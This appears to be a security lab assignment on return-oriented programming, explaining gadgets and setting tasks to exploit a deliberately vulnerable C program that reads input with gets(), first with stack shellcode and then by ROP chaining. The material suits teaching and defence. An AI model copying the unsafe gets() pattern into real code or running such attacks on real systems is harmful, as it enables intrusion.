Return Oriented Programming(ROP)

Return-oriented programming is a security attack technique in which attacker can execute code in the presence of defensive measures such as executable space protection (Non executable memory segments).

In normal buffer overflow attack, attacker uses local buffer to spray specific shell code on stack and also overrides return address to execute this shell code, But having executable space protection makes this attack invalid. ROP attack tries to execute arbitrary code present in the executable regions of the memory thus invalidating executable space protection. A sequence of instructions ending in RET is called a gadget.

    pop %rdi
    retq

Rop uses gadgets to perform the attacks. Stack-Smashing Protector and ASLR can be disabled during the attack.

Jump-start task

To get hang of it, As a first step start with basic buffer overflow attack on victim program by disabling executable space protection, place the shell code (designed to execute system call to get access to command shell) into the buffer and also overwrite the return address to execute this shell code. next enable executable space protection and perform above step but now using ROP technique. i.e using the pre existing gadgets perform the attack.You may use old library version to get basic gadget as mentioned above. Following is the sample victim program.

#include <stdio.h> 
int main() 
{ 
    char name[64]; 
    puts("Input your name:"); 
    gets(name); 
    printf(", %s!\n", name); 
    return 0; 
}

Minimal-Requirement task:

1) You need design a complex attack using gadget chaining. 2) Must use newer versions of all software modules involved (as much newer as possible). 3) Must be able to perform attack both in 32 and 64 bit architectures (depending on complexity of your attack this task can be adjusted to bonus task)

Bonus task

Use popular software to demontrate the attack Come up with solutions(apart from existing solutions) to mitigate these attacks